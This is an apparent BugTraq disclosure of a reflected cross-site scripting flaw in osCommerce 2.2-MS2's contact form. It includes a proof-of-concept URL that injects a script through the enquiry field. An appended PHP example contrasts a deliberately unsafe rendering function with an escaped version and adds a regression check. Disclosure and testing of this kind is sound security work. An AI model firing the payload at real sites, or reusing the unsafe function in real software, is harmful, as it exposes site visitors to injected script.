BugTraq
[NOBYTES.COM: #3] osCommerce 2.2-MS2 - XSS Vulnerability
Feb 15 2005 09:59PM
John Cobb (johnc nobytes com)
Hello All,
I have discovered an XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC (at) NoBytes (dot) com
http://www.nobytes.com
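
The pattern behind this report and its fix, as an added example that is not part of the original post and is not osCommerce's own code. It assumes the `enquiry` request value is echoed back between the contact form's textarea tags, which the `</textarea>` prefix in the example URL suggests; the function names are hypothetical and the check needs PHP's DOM extension.

```php
<?php
// Added example: hypothetical helpers, not osCommerce source code.

// Vulnerable pattern: the request value is placed between the textarea
// tags as-is, so a value containing "</textarea>" ends the element and
// everything after it is parsed as markup.
function render_enquiry_unsafe(string $enquiry): string
{
    return '<textarea name="enquiry" cols="50" rows="15">' . $enquiry . '</textarea>';
}

// Hardened pattern: encode HTML metacharacters at output time so the
// value stays plain text inside the element.
function render_enquiry_safe(string $enquiry): string
{
    $encoded = htmlspecialchars($enquiry, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<textarea name="enquiry" cols="50" rows="15">' . $encoded . '</textarea>';
}

// Regression check: parse the rendered fragment and count the <script>
// elements an HTML parser finds in it.
function count_script_elements(string $html): int
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // the stray closing tag is reported as a parse warning
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

// The enquiry value from the advisory's example URL, decoded the way PHP
// decodes query-string parameters.
$enquiry = urldecode("%3C/textarea%3E%3Cscript%3Ealert('w00t');%3C/script%3E");

printf("unsafe: %d script element(s)\n", count_script_elements(render_enquiry_unsafe($enquiry)));
printf("safe:   %d script element(s)\n", count_script_elements(render_enquiry_safe($enquiry)));
```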